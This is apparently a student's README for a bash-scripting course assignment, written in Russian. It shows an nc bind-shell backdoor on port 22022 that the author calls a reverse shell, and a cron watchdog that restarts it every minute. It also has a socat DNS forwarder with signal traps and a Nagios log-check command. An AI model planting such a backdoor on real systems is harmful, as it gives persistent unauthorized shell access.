# Otus_task4

Самый простой пример скрипта который может быть использован как костыль,
это однострочник с ssh для пробороса портов или что-то с nc/socat

пример - реверс шелл на 22022 порту
```
cat backdoor.sh
#!/bin/bash
nc -e /bin/bash -lp 22022 &
```

тогда простейший watchdog будет выглядеть так
```
cat sheduller.sh
#!/bin/bash
if [ ! "$(/usr/sbin/pidof nc)" ]
	then /home/vagrant/backdoor.sh
	echo "start up backdoor again...."| mail -s "cool_story" root
fi
```
а в планировщике 
```
crontab -l
* * * * * 	/home/vagrant/sheduller.sh
```
-------------------------------------------------------------------------------------------------------------------------------------
Пример трапа, 
один раз потребовалось на маке быстро развернуть днс сервер
потому что не хотел ставиться плагин для вагранта


```
#!/bin/bash
strt=0
trap '' 2 3 9 14 15
trap 'echo "Exit"; exit 1' 1 # выход только через SIGHUP

for i in $(/sbin/pidof socat)
        do
            if [ "$(echo $(cat /proc/$i/cmdline | tr '\0' ' '))" = "socat TCP-LISTEN:53,fork TCP:8.8.8.8:53" ] # именно наш процесс соката
                then
                        strt=1
                        break
                else
                        /bin/socat UDP4-RECVFROM:53,fork UDP4-SENDTO:8.8.8.8:53 # пробрасывает порты

            fi
        done

```





-------------------------------------------------------------------------------------------------------------------------------------
Скрипт подсчета уникальных пользвателей и статистики пока нет времени писать, так что покажу что у нас раньше на работе применялось.
Команда запуска скрипта на python для подсчета ошибок в логе (с метками до какого момента скрипт уже отработал, и буден запущен снова)
скрипт - второй файлик в проекте - check_parser
```
command[check_moneta]=/usr/lib/nagios/plugins/check_parser -f /var/log/jboss/moneta.log -s "ERROR" -r date_2 -p pattern_2  -w 5 -c 10
```